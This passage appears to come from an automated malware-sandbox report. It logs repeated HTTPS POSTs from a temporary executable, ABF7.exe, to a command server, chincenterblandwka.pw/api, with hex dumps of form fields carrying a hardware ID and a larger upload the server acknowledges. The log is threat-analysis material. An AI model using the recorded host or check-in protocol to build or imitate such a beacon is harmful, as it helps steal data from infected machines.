18	192.168.2.4	49808	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:11 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:11 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:11 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e8m0c3gn0po0jp81ik2se2fc1l; expires=Sun, 21-Apr-2024 10:44:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=siOH8%2F82249fWYzHqIc5n6Ox%2BgAREecJzvry6eVQiVZGlDc2SqZY6vyENXDs5R1Lw1ujBHnYaeKoLQnnl9tl8qlp5wHefboBZr0WNUEHeK0RolXXPdOujzZ1D2tNf2AAoyxUnfD1fuY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b5d4ca4aa46-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:11 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49812	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:12 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:12 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:12 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bg84sermdjsd3u4qrt56pib5ie; expires=Sun, 21-Apr-2024 10:44:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lUSMwV9ZaiDmgNglVCjsJFdFFSEX2Qbw72ZnG%2Bol5SPis1WMxJ6CqWdJGviMlsRL4T%2F5iwo8cF6pIK2HYroaHmHShjCpzCwkmdtZuboiUlt83eFZRqw2heOAOFRBfnxSNGdW2H4mlAA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b63dc3447a6-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:12 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49816	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:13 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:13 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:13 UTC	1327	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lgtcdu7gkccrco0kcadcnc5inq; expires=Sun, 21-Apr-2024 10:44:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PgqgZhk%2BMtvpStUF7Riq3i%2BCbzs6LaYkxh9L4QzCC%2F7Pvea3eUVmaL2n2BSzmyUJsz0xHS8WfmbY8uyoh3G9SR1a0ehKkd46hZhmRJpVZlNhReX7T0zNP2rORRDPHD89rDmicB5QBJo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b6a6a243590-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:13 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49818	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:14 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:14 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:16 UTC	1339	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1n9f3gtabn2qrjpk8uveep8rqu; expires=Sun, 21-Apr-2024 10:44:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2MQ9ShR6CRYoK%2Bdg%2F%2FjHZxLl92Gfcy14%2Btoxfunkt2OekvZlBKCH4ekgWX6IPoCjruA%2F8cdPwQJqIWnVkU%2F3RJjA%2Fmww8%2FHbUwposxT9tawq5HgDa2GxxmQK9tikQXnxWQlF9fPe%2FwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b70e98b4683-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:16 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49826	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:16 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:16 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:17 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lposp20p76jbtcncav0sqevcpg; expires=Sun, 21-Apr-2024 10:44:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2oRJXZqcJD373fHLA335CF6XdgKDwRayKWDSF2%2BCEOXimK578P%2BGS9j1jrEjr4JCzOc6r9DOueJmBXD1sNxVoq24TR5lUXBwvqHMB9AfidoxsRRnv5WfxRg57v1iDvcERlFsLM5qxpw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b80cfefead9-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:17 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49830	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:18 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 9612 Host: chincenterblandwka.pw
2023-12-27 16:58:18 UTC	9612	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:19 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fgm73s4ar56h7o4nnbd3indpq8; expires=Sun, 21-Apr-2024 10:44:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RjuHjp4g7TeqcO8QHSgw37pQzo3sUgXKCQvZn2zzn8RzT%2BfkCDY%2BdUxXhSyqAwo1S4rVLePxxrmQ4m%2Bg5vMaA2STnQRs1noXl9FtYgF%2B5kKGyipABnfrLCksuHjc0FrAEMgcXuHxDRk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b8aa8ed2e79-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:58:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49834	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:20 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:20 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:22 UTC	1331	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u0mdee0a2kccc813l04ip1mgjp; expires=Sun, 21-Apr-2024 10:45:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ydgb9ylq4KfRfAnxZxzuAJ8WpOMQZisU4ldgw2zJiR9MlkZsvbcyRM4yhwllXv3UmPHgPr2vUbsNZrNUbXBT9%2BmLZY2t9c6MMZSelxn68p984TTEt7hBCsWUkhIx%2Fpv%2FpmU%2BR%2FSaMrw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b983e5046e9-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:22 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49839	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:23 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
